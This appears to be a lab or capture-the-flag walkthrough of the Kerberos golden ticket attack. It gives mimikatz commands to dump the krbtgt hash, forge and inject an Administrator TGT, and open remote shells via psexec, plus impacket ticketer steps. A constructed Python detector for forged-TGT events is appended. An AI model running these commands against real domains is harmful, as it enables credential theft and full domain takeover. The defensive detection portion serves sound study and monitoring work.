Here we have the hash of the Kerberos ticket-granting ticket account (krbtgt), with which we can forge a TGT, i.e. a golden ticket.

Run mimikatz and elevate:
privilege::debug

Dump the krbtgt secrets from LSA:
lsadump::lsa /inject /name:krbtgt

Copy the krbtgt NTLM hash and the domain SID into notepad for later use:
{% code overflow="wrap" %}
kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-3537832060-1456167142-1983014419 /krbtgt:b72f4a5ed9bef0f6a0ec3d4b5a4e4320 /id:500 /ptt
{% endcode %}
- /User can be any name
- /id is the RID; 500 is the built-in Administrator
- /ptt means pass the ticket: the forged TGT is injected into the current session rather than written to disk
- With the ticket in memory we can access other computers on the network:
dir \\THEPUNISHER\c$
psexec.exe \\THEPUNISHER cmd.exe
to get a shell
- Since we have the krbtgt NT hash we can do a golden ticket attack:
krbtgt:819af826bb148e603acb0f33d17632f8
- We also need the domain SID. Using PowerSploit from PowerShell:
Get-DomainSID -Domain htb.local
From Linux (impacket):
lookupsid.py CORP/[email protected]
- Now use this information with impacket's ticketer to forge the golden ticket:
ticketer.py -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local user
- Point the Kerberos credential cache environment variable at the .ccache file ticketer wrote:
export KRB5CCNAME=DoesNotExist.ccache
- Note: before running psexec check that DNS resolves the target host name and that the clock is in sync with the DC; Kerberos rejects requests outside its clock-skew tolerance.
psexec.py -debug htb.local/administrator@forest -k -no-pass
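From the defender's side, the forged TGT above leaves a characteristic trace on the Domain Controller: the service-ticket request (event 4769) arrives without the client ever having requested a TGT (event 4768), and a ticket forged from the krbtgt NT hash is RC4-HMAC (encryption type 0x17) even in an AES domain. The following is an added example, not part of the original note; the event records are constructed and the field names are a simplified version of the Windows audit fields.

```python
from datetime import datetime, timedelta

# Constructed sample Domain Controller events (hypothetical, not captured data).
# 4768 = TGT requested (AS exchange), 4769 = service ticket requested (TGS exchange).
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-01-10T09:00:00", "user": "jdoe", "client": "10.0.0.5", "etype": "0x12"},
    {"id": 4769, "time": "2024-01-10T09:00:02", "user": "jdoe", "client": "10.0.0.5", "etype": "0x12"},
    # No 4768 for this account/client, and the ticket is RC4: the pattern a forged TGT leaves.
    {"id": 4769, "time": "2024-01-10T11:30:00", "user": "Administrator", "client": "10.0.0.99", "etype": "0x17"},
]

RC4_HMAC = "0x17"


def find_forged_tgt_indicators(events, tgt_lifetime=timedelta(hours=10), aes_domain=True):
    """Return (user, client, reason) tuples for 4769 events that look like golden-ticket use.

    Events from all DCs must be collected centrally first: a client may legitimately
    get its TGT from one DC and its service tickets from another.
    """
    last_tgt = {}  # (user, client) -> time of the most recent 4768
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["user"].lower(), ev["client"])
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4768:
            last_tgt[key] = when
            continue
        if ev["id"] != 4769:
            continue
        seen = last_tgt.get(key)
        # A legitimate client obtained its TGT from the KDC within the TGT lifetime
        # (10 hours is the default domain policy); a forged TGT never went through the AS exchange.
        if seen is None or when - seen > tgt_lifetime:
            findings.append((ev["user"], ev["client"], "TGS request without a prior TGT request"))
        # ticketer/mimikatz forge from the NT hash, so the ticket is RC4; an AES domain should not see 0x17.
        if aes_domain and ev["etype"] == RC4_HMAC:
            findings.append((ev["user"], ev["client"], "RC4-HMAC ticket in an AES domain"))
    return findings


if __name__ == "__main__":
    for user, client, reason in find_forged_tgt_indicators(SAMPLE_EVENTS):
        print(f"{user} from {client}: {reason}")
```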